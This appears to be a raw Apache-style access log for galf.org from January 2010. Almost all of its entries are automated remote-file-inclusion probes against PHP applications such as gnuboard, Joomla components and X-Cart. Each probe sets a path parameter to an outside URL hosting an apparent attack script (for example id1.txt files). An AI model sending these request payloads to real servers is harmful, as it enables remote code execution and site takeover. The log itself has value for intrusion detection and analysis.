202.131.226.52 - - [25/Jan/2010:08:02:03 -0800] "GET /board/bbs/delete_all.php//logs/access.log//write_update.php?board_skin_path=http://jil.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [25/Jan/2010:08:04:03 -0800] "GET /board/bbs/delete_all.php//logs/access.log//write_update.php?board_skin_path=http://jil.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [25/Jan/2010:08:04:03 -0800] "GET /logs//board/bbs/delete_all.php//logs/access.log//write_update.php?board_skin_path=http://jil.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [25/Jan/2010:08:04:03 -0800] "GET /logs/access.log%20%20//board/bbs/delete_all.php//logs/access.log//write_update.php?board_skin_path=http://jil.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:08:04:08 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:08:04:08 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:08:04:08 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [25/Jan/2010:08:05:08 -0800] "GET /logs/access_100111.log//admin/auth.php?xcart_dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.136 - - [25/Jan/2010:08:05:10 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
118.129.166.136 - - [25/Jan/2010:08:05:10 -0800] "GET /admin/auth.php?xcart_dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
118.129.166.136 - - [25/Jan/2010:08:05:10 -0800] "GET /logs/access.log%20%20//admin/auth.php?xcart_dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
118.129.166.136 - - [25/Jan/2010:08:06:00 -0800] "GET /admin/auth.php?xcart_dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.136 - - [25/Jan/2010:08:06:00 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.136 - - [25/Jan/2010:08:06:00 -0800] "GET /logs/access_090810.log//admin/auth.php?xcart_dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.136 - - [25/Jan/2010:08:06:27 -0800] "GET /logs/access_090803.log//admin/auth.php?xcart_dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [25/Jan/2010:08:06:56 -0800] "GET /admin/auth.php?xcart_dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.55.15.194 - - [25/Jan/2010:08:06:56 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.55.15.194 - - [25/Jan/2010:08:06:56 -0800] "GET /logs/access.log%20%20//admin/auth.php?xcart_dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
194.63.235.157 - - [25/Jan/2010:08:07:04 -0800] "GET /logs/access_100111.log//admin/auth.php?xcart_dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [25/Jan/2010:08:07:45 -0800] "GET /admin/auth.php?xcart_dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [25/Jan/2010:08:07:45 -0800] "GET /logs/access_100111.log%20%20//admin/auth.php?xcart_dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [25/Jan/2010:08:07:46 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [25/Jan/2010:08:08:35 -0800] "GET /logs/access_100118.log%20%20//board/bbs/delete_all.php//logs/access.log//write_update.php?board_skin_path=http://jil.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [25/Jan/2010:08:09:12 -0800] "GET //write_update.php?board_skin_path=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [25/Jan/2010:08:09:12 -0800] "GET /logs/access.log%20%20///write_update.php?board_skin_path=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [25/Jan/2010:08:09:12 -0800] "GET /logs///write_update.php?board_skin_path=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.136 - - [25/Jan/2010:08:09:44 -0800] "GET /logs/access_100111.log//admin/auth.php?xcart_dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [25/Jan/2010:08:10:53 -0800] "GET /logs/access_090720.log//admin/auth.php?xcart_dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.94.62 - - [25/Jan/2010:08:11:01 -0800] "GET /logs//displayCategory.php?basepath=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.94.62 - - [25/Jan/2010:08:11:02 -0800] "GET /displayCategory.php?basepath=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [25/Jan/2010:08:11:13 -0800] "GET /logs/access_090803.log//admin/auth.php?xcart_dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
76.73.56.44 - - [25/Jan/2010:08:11:24 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.defusco.com/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
76.73.56.44 - - [25/Jan/2010:08:11:24 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.defusco.com/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
76.73.56.44 - - [25/Jan/2010:08:11:25 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.defusco.com/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
76.73.56.44 - - [25/Jan/2010:08:11:25 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.defusco.com/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
76.73.56.44 - - [25/Jan/2010:08:11:26 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.defusco.com/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
76.73.56.44 - - [25/Jan/2010:08:11:26 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.defusco.com/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
125.128.28.202 - - [25/Jan/2010:08:12:16 -0800] "GET /displayCategory.php?basepath=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.128.28.202 - - [25/Jan/2010:08:12:16 -0800] "GET /logs/access_090720.log//displayCategory.php?basepath=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [25/Jan/2010:08:12:18 -0800] "GET /logs/access_100118.log%20%20//board/bbs/delete_all.php//logs/access.log//write_update.php?board_skin_path=http://jil.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.128.28.202 - - [25/Jan/2010:08:12:19 -0800] "GET /logs//displayCategory.php?basepath=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.124.149.168 - - [25/Jan/2010:08:13:51 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.124.149.168 - - [25/Jan/2010:08:13:51 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.124.149.168 - - [25/Jan/2010:08:13:51 -0800] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.55.15.194 - - [25/Jan/2010:08:14:17 -0800] "GET /logs/access.log//admin/auth.php?xcart_dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
116.125.126.97 - - [25/Jan/2010:08:14:41 -0800] "GET /logs/access.log/errors.php?error=http://www.pymexpo.org/skins/com/tool/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:08:15:16 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:08:15:16 -0800] "GET /logs/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:08:15:16 -0800] "GET /?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [25/Jan/2010:08:16:09 -0800] "GET /board/bbs/write_update.php//board/bbs/write_update.php?board_skin_path=http://suzuki4.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [25/Jan/2010:08:16:09 -0800] "GET /logs/access.log%20%20//board/bbs/write_update.php//board/bbs/write_update.php?board_skin_path=http://suzuki4.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [25/Jan/2010:08:16:09 -0800] "GET /logs//board/bbs/write_update.php//board/bbs/write_update.php?board_skin_path=http://suzuki4.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:08:17:09 -0800] "GET /logs/access_090921.log/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:08:17:13 -0800] "GET /logs/access.log/errors.php?error=http://www.frentesdeseguridad.gov.co/administrator//modules/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:08:17:20 -0800] "GET /logs/errors.php?error=http://www.frentesdeseguridad.gov.co/administrator//modules/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.250.252.242 - - [25/Jan/2010:08:20:07 -0800] "GET /logs/access_091221.log HTTP/1.1" 200 7054881 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:08:20:15 -0800] "GET /errors.php?error=http://www.frentesdeseguridad.gov.co/administrator//modules/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:08:20:15 -0800] "GET /logs/access.log/errors.php?error=http://www.frentesdeseguridad.gov.co/administrator//modules/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:08:20:17 -0800] "GET /logs/errors.php?error=http://www.frentesdeseguridad.gov.co/administrator//modules/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:08:21:49 -0800] "GET /logs/access_090615.log/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.94.62 - - [25/Jan/2010:08:23:43 -0800] "GET /logs/access_090720.log//displayCategory.php?basepath=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.214.172.197 - - [25/Jan/2010:08:23:46 -0800] "GET /?sourcedir=http://www.qqe.ru/forum/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
123.214.172.197 - - [25/Jan/2010:08:23:46 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.qqe.ru/forum/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.214.172.197 - - [25/Jan/2010:08:23:46 -0800] "GET /logs/?sourcedir=http://www.qqe.ru/forum/id1.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
123.214.172.197 - - [25/Jan/2010:08:23:55 -0800] "GET /logs/access_090720.log/?sourcedir=http://www.qqe.ru/forum/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.214.172.197 - - [25/Jan/2010:08:24:22 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://www.qqe.ru/forum/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.214.172.197 - - [25/Jan/2010:08:24:22 -0800] "GET /logs/?sourcedir=http://www.qqe.ru/forum/id1.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
123.214.172.197 - - [25/Jan/2010:08:24:23 -0800] "GET /?sourcedir=http://www.qqe.ru/forum/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [25/Jan/2010:08:24:29 -0800] "GET /logs/access.log//board/bbs/delete_all.php//logs/access.log//write_update.php?board_skin_path=http://jil.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
76.73.56.44 - - [25/Jan/2010:08:25:03 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.defusco.com/README.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
76.73.56.44 - - [25/Jan/2010:08:25:03 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.defusco.com/README.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
76.73.56.44 - - [25/Jan/2010:08:25:04 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.defusco.com/README.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:08:25:05 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://www.qqe.ru/forum/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:08:25:05 -0800] "GET /logs/?sourcedir=http://www.qqe.ru/forum/id1.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:08:25:06 -0800] "GET /?sourcedir=http://www.qqe.ru/forum/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [25/Jan/2010:08:25:07 -0800] "GET /logs/access_091130.log//components/com_galleria/board/board/bbs//mail.inc.php?skin_board_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [25/Jan/2010:08:25:07 -0800] "GET /logs//components/com_galleria/board/board/bbs//mail.inc.php?skin_board_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [25/Jan/2010:08:25:07 -0800] "GET /components/com_galleria/board/board/bbs//mail.inc.php?skin_board_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:08:25:35 -0800] "GET /logs/?sourcedir=http://www.qqe.ru/forum/id1.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:08:25:36 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.qqe.ru/forum/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:08:25:39 -0800] "GET /?sourcedir=http://www.qqe.ru/forum/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:08:26:06 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:08:26:06 -0800] "GET /logs/?sourcedir=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:08:26:06 -0800] "GET /?sourcedir=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:08:27:11 -0800] "GET /?sourcedir=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:08:27:20 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.37.206 - - [25/Jan/2010:08:29:36 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
213.171.37.206 - - [25/Jan/2010:08:29:36 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
218.38.12.14 - - [25/Jan/2010:08:30:42 -0800] "GET /write_update.php?skin_board_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [25/Jan/2010:08:30:48 -0800] "GET /logs/write_update.php?skin_board_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [25/Jan/2010:08:30:48 -0800] "GET /write_update.php?skin_board_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [25/Jan/2010:08:30:48 -0800] "GET /logs/access.log%20%20/write_update.php?skin_board_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [25/Jan/2010:08:30:50 -0800] "GET /logs/access.log%20%20/write_update.php?skin_board_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [25/Jan/2010:08:30:50 -0800] "GET /logs/write_update.php?skin_board_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [25/Jan/2010:08:30:50 -0800] "GET /write_update.php?skin_board_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.174.63.235 - - [25/Jan/2010:08:30:59 -0800] "GET /logs///?sourcedir=http://jil.fileave.com/id1.txt??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "galf.org"
211.174.63.235 - - [25/Jan/2010:08:30:59 -0800] "GET /logs/access.log%20%20///?sourcedir=http://jil.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.174.63.235 - - [25/Jan/2010:08:30:59 -0800] "GET //?sourcedir=http://jil.fileave.com/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
211.174.63.235 - - [25/Jan/2010:08:31:02 -0800] "GET //?sourcedir=http://jil.fileave.com/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
211.174.63.235 - - [25/Jan/2010:08:31:03 -0800] "GET /logs/access.log%20%20///?sourcedir=http://jil.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.174.63.235 - - [25/Jan/2010:08:31:03 -0800] "GET /logs///?sourcedir=http://jil.fileave.com/id1.txt??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "galf.org"
124.0.94.62 - - [25/Jan/2010:08:32:13 -0800] "GET /logs//write_update.php?board_skin_path=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.94.62 - - [25/Jan/2010:08:32:13 -0800] "GET /write_update.php?board_skin_path=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.94.62 - - [25/Jan/2010:08:32:15 -0800] "GET /logs/access.log%20%20//write_update.php?board_skin_path=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
186.28.232.13 - - [25/Jan/2010:08:32:37 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://ma-turkocagi.com/templates/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
186.28.232.13 - - [25/Jan/2010:08:32:37 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://ma-turkocagi.com/templates/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
124.0.94.62 - - [25/Jan/2010:08:33:41 -0800] "GET /logs/access_100118.log%20%20//write_update.php?board_skin_path=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [25/Jan/2010:08:34:20 -0800] "GET /logs/access_090907.log%20%20/main.php?x=http://epvs.ru/project_files/11_78.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.174.63.235 - - [25/Jan/2010:08:34:59 -0800] "GET /logs///?sourcedir=http://jil.fileave.com/id1.txt??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
211.174.63.235 - - [25/Jan/2010:08:34:59 -0800] "GET //?sourcedir=http://jil.fileave.com/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
211.174.63.235 - - [25/Jan/2010:08:34:59 -0800] "GET /logs/access_090921.log///?sourcedir=http://jil.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.174.63.235 - - [25/Jan/2010:08:35:11 -0800] "GET //?sourcedir=http://jil.fileave.com/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
211.174.63.235 - - [25/Jan/2010:08:35:11 -0800] "GET /logs/access_090921.log///?sourcedir=http://jil.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.174.63.235 - - [25/Jan/2010:08:35:11 -0800] "GET /logs///?sourcedir=http://jil.fileave.com/id1.txt??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
211.174.63.235 - - [25/Jan/2010:08:35:23 -0800] "GET /logs/access_090720.log///?sourcedir=http://jil.fileave.com/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.174.63.235 - - [25/Jan/2010:08:35:26 -0800] "GET /logs/access_090720.log///?sourcedir=http://jil.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.114.174.53 - - [25/Jan/2010:08:36:31 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lifezi.com/tpl/pop/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.114.174.53 - - [25/Jan/2010:08:36:31 -0800] "GET /logs/access_100104.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lifezi.com/tpl/pop/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.114.174.53 - - [25/Jan/2010:08:36:31 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lifezi.com/tpl/pop/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:08:38:37 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.frentesdeseguridad.gov.co/administrator//modules/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.216.33 - - [25/Jan/2010:08:39:36 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
125.128.28.202 - - [25/Jan/2010:08:42:04 -0800] "GET /errors.php?error=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.128.28.202 - - [25/Jan/2010:08:42:04 -0800] "GET /logs/access.log%20%20//errors.php?error=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.128.28.202 - - [25/Jan/2010:08:42:04 -0800] "GET /logs//errors.php?error=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.94.62 - - [25/Jan/2010:08:42:06 -0800] "GET /logs//errors.php?error=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.94.62 - - [25/Jan/2010:08:42:06 -0800] "GET /errors.php?error=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.94.62 - - [25/Jan/2010:08:42:06 -0800] "GET /logs/access.log%20%20//errors.php?error=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:08:42:22 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.frentesdeseguridad.gov.co/administrator//modules/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.128.28.202 - - [25/Jan/2010:08:42:28 -0800] "GET /errors.php?error=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.128.28.202 - - [25/Jan/2010:08:42:29 -0800] "GET /logs//errors.php?error=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
